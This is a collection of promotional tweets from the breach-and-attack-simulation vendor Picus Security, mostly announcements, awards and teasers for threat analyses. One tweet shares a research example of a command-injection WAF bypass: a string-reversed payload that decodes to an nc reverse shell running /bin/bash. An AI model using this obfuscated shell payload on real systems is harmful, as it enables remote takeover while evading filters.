A new technical analysis by Picus Labs! We revealed the Tactics, Techniques and Procedures (
#TTPs
) used in the
#SolarWinds
#breach
. Attackers used 20+ MITRE ATT&CK techniques. Take a look to read a detailed analysis of attack methods used by threat actors.
Wondering what actions you can take against leaked FireEye tools? No worries, Picus Labs analyzed all the 60 tools and revealed Tactics, Techniques and Procedures (
#TTPs
) used by them. Read our latest blog post for a detailed analysis and recommendations.
Picus has raised a $24M Series B funding!
Learn more about the plans and how Picus intends to continue improving its platform to offer the most comprehensive solution for security control validation in this latest blog by Alper Memis, Co-founder and CEO.
A command injection WAF bypass method discovered by Picus Labs researcher
@evrnyalcin
.
It uses "rev" and "printf" commands in command substitution.
Example: $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
Read the write-up for details and mitigations:
We've received a significant demand to publish our
#BlueTeam
Recommendations to defend against FireEye's stolen
#RedTeam
Tools.
In our new blog post, we shared our detection and prevention contents as
#SIGMA
and vendor queries, and prevention signatures.
🔴 Our red team engineer Furkan Göksel created a tool for in memory PE execution. This tool can be used to encrypt, embed and load given PE files. Check this out ⬇️
#redteam
#infosec
#picussecurity
We are proud to be listed as a representative Breach and Attack Simulation (BAS) Vendor in the latest
@gartner
research conducted by
@anton_chuvakin
and
@apbarros
#ChatGPT
has been receiving a lot of attention from information security professionals over the past week.
Learn more about Dr.Suleyman Ozarslan's experiment and how ChatGPT is changing the way
#cybersecurity
practitioners look at the potential of
#AI
Picus Endpoint Simulation Module (ESM) is empowered with the “Impact” tactic recently added to the MITRE’s ATT&CK Framework and the techniques covered by this tactic. Picus Labs follows updates to the ATT&CK framework and enhances the Picus Threat Database accordingly.
#ATT
&CK
#RSAC2020
is just around the corner! Schedule a meeting with the team and learn more about
#Picus
#BreachAndAttackSimulation
Platform. We look forward to meeting you there! Click the link for schedule a meeting:
#RSAC2018
has already started! We are excited to show you our continuous Breach and Attack Simulation Platform in action, don't forget to come and say hi!
We’re truly excited to be recognized for our innovations in the Breach and Attack Simulation (BAS) Category in Annual Cybersecurity Breakthrough Awards Program.
@InfoSec_Awards
#CyberSecurity
#award2018
We are excited to announce that Picus has joined the
@msftsecurity
Intelligent Security Association (
#MISA
). The Platform now helps security teams achieve the best possible protection from Microsoft Defender for Endpoint and Microsoft Sentinel. Learn more:
It’s a wrap!! Our team had the best time at
#RSAC19
, huge thank you to everyone who came to visit our booth this week!
If you missed it, don’t sweat, you can come see us next year!
Picus is the first Breach and Attack Simulation (BAS) platform that has released an attack simulation and a detection rule for CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability.
Picus provides our users not only the attacks but also the necessary defense signatures.
Our new blog post explains how the Breach and Attack Simulation (BAS) approach fits into the vulnerability scanning, penetration testing and red teaming continuum in reference to the Adversarial Attack Simulations Exercises (“AASE”) Guidelines.
#BAS
At
#SOCReLoad21
,
@DavidJBianco
spoke about the ‘Defender’s Dilemma’ and why it's a misleading proposition built upon four false assumptions or ‘lies’. View this summary infographic to discover some key takeaways from the session. Watch on-demand ➡️
Is your security infrastructure ready for
#Spectre
(
#CVE
-2017-5715 branch target injection) and
#Meltdown
(
#CVE
-2017-5754 rogue data cache load) PoC attacks? Picus' customers already have the answer!
Our CTO
@aytekyuksel
spoke on a panel today along with participants from
@eBay
&
@VMware
about “Building a Zero Trust Model with Next Generation Segmentation” at the Cloud Security Summit hosted by
@PaloAltoNtwks
. Come chat with us at our Booth before the end of the event!
How do you uncover a
#malicious
VBA macro code hidden using 15 different
#obfuscation
methods❓
Check out our new blog post "Emotet Technical Analysis - Part 1 Reveal the Evil Code" for step by step deobfuscation of a recent
#Emotet
malware document📄.
SC Media named Picus Continuous Security Validation Platform a “2019 Innovator in the Analysis and Testing category”! To find out why SC Media Labs chose
#Picus
as an innovator. Click to read:
We're partnering with
@F5Networks
to ensure that
#WAF
admins & security managers can dynamically identify, measure and mitigate
#securitythreats
targeting applications. Learn more here: &
Researchers list the top 20 vulnerabilities currently exploited by threat groups.
Picus simulates all of them in addition to 634 vulnerability attacks and 124 APT groups.
Top 3 vulnerabilities:
• CVE-2017-11882
• CVE-2018-8174
• CVE-2017-0199
⭐We have very good news! Picus is a finalist six in categories at the
@CSMagAndAwards
🚀This includes Breach and Attack Simulation Solution of the Year. We would greatly appreciate your support by voting for us here:
"Cybersecurity exists until you are breached” says
@peteherzog
in his recent blog post, addressing the most prevalent “how”, “what" and “why” questions about
#breach
and
#attack
simulation (BAS) technology. Check out Part 1 via
Do you know emerged
#XSS
payloads without parentheses, semi-colons and string literals
#bypass
some signature-based filters of Web Application Firewalls (
#WAFs
) and browsers?
Test your security controls now with 300+ XSS payloads included in the Picus Threat Database
We have included exploits of the new
#Adobe
#Flash
0-day
#vulnerability
(
#CVE
-2018-15982) in our ThreatDB within hours of appearing. Our customers are advised to test their
#security
#controls
against these exploits allowing control over the victim system.
#MITRE
ATT&CK can be complex starting out.
We came up with The Red Report to untangle this, offering practical info e.g. simulation techniques, detection rules, and much more! Stay tuned as we’ll be posting snippets of these gems in the next few weeks!
We are honored to announce
@PicusSecurity
co-founders are among 25 high-impact entrepreneurs selected by
@endeavor_global
at the 84th International Selection Panel (ISP) held in South Africa last week.
Read more here:
I am honored to have been asked to join the Advisory Board for
@PicusSecurity
. Picus play in the Breach and Attack Simulation market, and I am excited to be able to contribute to and learn about this new and emerging security domain.
A new technical analysis by Picus Labs! We revealed the Tactics, Techniques, and Procedures (
#TTPs
) used by HAFNIUM to target
#MicrosoftExchange
servers. Attackers use 15 MITRE ATT&CK techniques. Take a look to read a detailed analysis of
#attack
methods.
We are honored to announce our partnership with
@LutechGroup
, one of Europe’s leading players in ICT services and solutions.
Picus
#Breach
and
#Attack
#Simulation
Platform address concerns on the cybersecurity readiness of Lutech's customers.
Read more:
1/10: Get excited everyone 🚨🚨🚨 we’re doing another tweetstorm on a
#MITRE
ATT&CK technique - T1086 Powershell by our very own Dr. Süleyman Özarslan.
Before we get started, what do you guys find more helpful: red teaming or blue teaming?
#infosec
#cybersecurity
Did you know that each month over 8,000 businesses are targeted by email-based attacks? By using Picus “Email Threat Simulation” feature, you can now test your email security controls in real-time and instantly mitigate security gaps.
🚨How to test your ability to prevent, detect and respond to this new
#Log4J
exploit? The Picus platform can help you test your readiness by simulating this exploit against your security controls on a truly continuous basis. Discover how we do it ⬇️
🍰 We’re wondering if
@MuseeLouvre
simulated a cake attack at some point to ensure the security glass can properly protect this highly critical asset😁. Are you doing the same for your key assets? 🚀 With Picus, simulate real-world attacks to test your defenses within minutes.
Picus is the first BAS vendor to add coverage for attacks that exploit PrintNightmare (CVE-2021-1675) vulnerability affecting even fully patched Windows systems. Get more info from our latest blog:
#informationsecurity
#cyberattack
#printnightmare
#Sodinokibi
ransomware has caused trouble in targeted attacks, spread by spear-phishing, exploits, remote services and compromised websites.
Check out further insights in our blog post 'Cyber Crime Turns Cyber Racket - Tackling Ransomware Before It Hits':
🎊The Series B funding is a significant milestone toward our vision of making
#SecurityControlValidation
an integral part of every organization's day-to-day security activities ➡️ Read the CEO announcement to learn more about our future plans 🚀
Our blue team leader
@oguzpamuk
has developed a tool for users of Carbon Black EDR that assists in identifying watchlists defined as 'expensive', which may negatively impact product performance and detection monitoring processes. ⬇️
The Ranzy Locker ransomware has been responsible for high-profile breaches since 2020. According to the recent FBI report, Ranzy had compromised over 30 businesses in the U.S. alone. Check out our latest blog post where we analyzed TTPs utilized by Ranzy.
Why do you need Continuous Security Validation? Download our
#whitepaper
“Breach and Attack Simulation: A Novel Cybersecurity Validation Approach” to discover the value of a threat-centric approach to your security operation.
#informationsecurity
Announcing our next ATT&CK in Action webinar!
This week, we're putting T1036 Masquerading in the hot seat - the fourth most commonly used technique used by adversaries in 2019.
Register now and join Picus and
@shelldaemon
from
@Darktrace
on July 16th.
🚀 Introducing Cloud Security Validation, the latest addition to The Picus Platform.
Learn how CSV simulates real-world cloud attack scenarios to help you proactively identify and address cloud risks, and validate that cloud controls work as expected.
How to Build a
#RedTeaming
Attack Scenario | Part 1: Bypass
#Security
Controls
Developing attack scenarios is an essential part of a
#RedTeam
operation. Read the blog to discover the design and development phase of an
#attack
scenario:
#cybersecurity
The Picus Threat Database now includes the new
#spamcampaign
launched by the threat actors behind
#Emotet
, issued with a
@USCERT
alert. It spreads through seemingly legitimate Word/PDF files sent to targets in the US, the UK, Turkey & South Africa.
@ESET
May the forces of hackers become confused on the way to your security controls-or even better, stay proactive and start validating!Picus Security wishes you a healthy, happy, and secure new year. ✨️✨️
We will be exhibiting with
@EXN_UK
at
@Infosecurity
2018 next week. Join our experts to discuss the most pressing issues in cybersecurity and let them show you how Breach and Attack Simulation works in action!
#infosecurity2018
Thank you so much for all the contributors who made us have one of the highest scores in the Breach & Attack Simulation Market! We love to read your feedback, and we do love to share them ♥️
The second day of the CPX 360 organized by
@CheckPointSW
in Vienna is underway! If you’re around, make sure you drop by our stand, chat with our experts and find out how Continuous Security Enhancement works in action.
#CPX360
#CyberSecurity
Cyber Rangers Web Series 🤖 Season 1-Episode 2:
"8 Steps to Deal with COVID-19 in Cyber Security"
🗓️ April 2 - 11AM GMT. Register Now:
#Covid19
#security
#webinar
#blueteam
🚀 Picus is organizing the second Bootcamp with
@patika_dev
“Picus Cyber Talent Academy” now! 💻 Join the Academy 🌎 Finish a world-class
#cybersecurity
training
🎓 Get the chance to work at Picus! Learn more ➡️
Picus Threat Database is updated with the recent PDF files exploiting double zero-days, namely
#CVE
-2018-4990 RCE in Adobe Reader and
#CVE
-2018-8120 Privilege escalation in Microsoft Windows.
You can find out more about these zero-days via:
Last year's SOCReload Event on building a proactive SOC was greatly enhanced by
@peteherzog
participation. 🎉SOCReLoad is back! Join us at
#SOCReLoad21
to hear thought leaders from across the industry discuss ways to modernize security operations:
🚨Log4j wreaking havoc has a far greater impact than anticipated. 🚀 No worries, this blog explains how to simulate CVE-2021-44228 attacks before real attackers and how to utilize their WAF and IPS to prevent these attacks. 💪 Click here to learn more:
🎄 Picus Security wishes you a healthy, happy, and cyber secure new year. 🎊
We wish all the attacks that hit you in 2021 to be the ones simulated by Picus!
Dacls
#RAT
targeting Windows and Linux is linked with
#Lazarus
Group. It exploits
#Confluence
CVE-2019-3396 vulnerability for spreading. Test your security controls against 600+
#exploits
and 100+
#APTs
with Picus. Request a demo:
We would like to announce the 10 lucky winners who participated in our System Information Discovery Webinar and won a book of
@erdal_ozkaya
! Thank you for your interest in our webinar.
And we would like to once again thank
@erdal_ozkaya
for having a webinar with us.
.
@Webroot
recently ranked the Nastiest
#malware
of 2018 proved to be the most detrimental to users throughout the year.
@Picus
clients rest assured, we’re ahead of the game: the full list was already in our extensive
#Threat
Database!
Picus Threat Database is updated with the most recent Flash 0-day vulnerability, tracked as CVE-2018-5002, impacting users with Adobe Flash Player 20.0.0.171 and earlier versions.
Find out more about this vulnerability:
What are the key components to supercharge your security operations? Don't miss this keynote of
@CCrowMontance
where he shares actionable insights on modernizing your security operations. You can now watch it on demand!
Join us at
#BlackHatUSA
to meet our CEO Alper Memis!
Booth
#2700
is your destination for live demos, swag, and a photo op with the best fighter pilot in the Navy on August 9th!
Learn more: